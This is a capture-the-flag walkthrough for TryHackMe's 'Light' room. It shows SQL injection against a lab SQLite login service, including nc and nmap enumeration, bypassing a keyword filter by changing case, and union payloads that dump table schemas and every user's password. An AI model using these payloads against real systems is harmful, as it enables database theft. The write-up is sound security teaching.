Introduction

Detailed walkthroughs for Light CTF challenges on TryHackMe .

Description

I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc 10.10.95.233 1337 You can use the username smokey in order to get started.

Enumaration

sudo echo 10.10.95.233 light.thm >> /etc/hosts

Mapped the ip to domain light.thm.

NetCat

We receive the password when a valid username is entered.

$ nc light.thm 1337 
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: Mike
Username not found.

nmap

Let’s scan for other open ports on this IP.

$ nmap light.thm -sV -sC -p-          
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 61:c5:06:f2:4a:20:5b:cd:09:4d:72:b0:a5:aa:ce:71 (RSA)
|   256 51:e0:5f:fa:81:64:d3:d9:26:24:16:ca:45:94:c2:00 (ECDSA)
|_  256 77:e1:36:3b:95:9d:e0:3e:0a:56:82:b2:9d:4c:fe:1a (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Welcome to the Light database!
|     Please enter your username:
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     Welcome to the Light database!
|     Please enter your username: Username not found.
|_    Please enter your username:
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We’re unable to access the shell via SSH using Smokey’s password. Let’s attempt to analyze the behavior of the database (1337) instead.

Response analysis

Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
Please enter your username: '--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 'error  
Error: near "error": syntax error
Please enter your username: error'        
Error: unrecognized token: "'error'' LIMIT 30"
Please enter your username: 'union
Ahh there is a word in there I don't like :(

By providing different inputs, we encountered a database error. Based on the inputs and responses above, the SQL query being used appears to be:

select password from users where username='input' LIMIT 30

Bypassing detection

Let’s attempt to use some SQL keywords here.

Please enter your username: select
Ahh there is a word in there I don't like :(
Please enter your username: union
Ahh there is a word in there I don't like :(

It detects the strings select and union and responds with, Ahh, there's a word in there I don't like :(. Let’s attempt to bypass this. By changing the case of the word, I was able to bypass it.

Please enter your username: Union
Username not found.
Please enter your username: Select
Username not found.

By using a mix of uppercase and lowercase in keywords like SELECT and UNION, we can bypass detection.

Detection DBMS

Let’s attempt a union-based attack.

Please enter your username: 'Union Select true'
Password: 1
Please enter your username: 'Union Select false'
Password: 0

We can execute union attacks successfully. Now, let’s try to retrieve the database version. Reference: link1 , link2 

Please enter your username: 'Union Select @@version'
Error: unrecognized token: "@"
Please enter your username: 'Union Select %40%40version'
Error: near "%": syntax error
Please enter your username: 'Union Select version()'
Error: no such function: version
Please enter your username: 'Union Select v$version'
Error: no such column: v$version
Please enter your username: 'Union Select banner FROM v$version'
Error: no such table: v$version
Please enter your username: 'Union Select version FROM v$instance'
Error: no such table: v$instance
Please enter your username: 'Union Select sqlite_version()'
Password: 3.31.1

We have received the result indicating that an SQLite database is being used.

Dumping DBMS Structure

Let’s use SQLite database keywords and attempt to dump the data. Reference 

Please enter your username: 'Union Select sql From sqlite_master'
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
Please enter your username: SELECT    
Ahh there is a word in there I don't like :(
Please enter your username: 'Union sELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%''
Password: usertable,admintable

We have obtained the table names here.

Please enter your username: 'Union sELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('usertable')'
Password: id,username,password
Please enter your username: 'Union sELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('admintable')'      
Password: id,username,password

We have retrieved the column names here.

Dumping all data

Please enter your username: 'Union Select GROUP_CONCAT(username) from usertable'
Password: alice,rob,john,michael,smokey,hazel,ralph,steve                                    
Please enter your username: 'Union Select GROUP_CONCAT(password) from usertable'             
Password: tF8tj2o94WE4LKC,yAn4fPaF2qpCKpR,e74tqwRh2oApPo6,7DV4dwA0g5FacRe,vYQ5ngPpw8AdUmL,EcSuU35WlVipjXG,YO1U9O1m52aJImA,WObjufHX1foR8d7

We have extracted the data from the “usertable.”

Please enter your username: 'Union Select GROUP_CONCAT(username) from admintable'            
Password: T**********n,flag                                                                
Please enter your username: 'Union Select GROUP_CONCAT(password) from admintable'
Password: mam***************q17,THM{S********************nO?}
Please enter your username:

We have extracted the data from the admintable, and this marks the end of the CTF.

Happy Hacking !!! 😎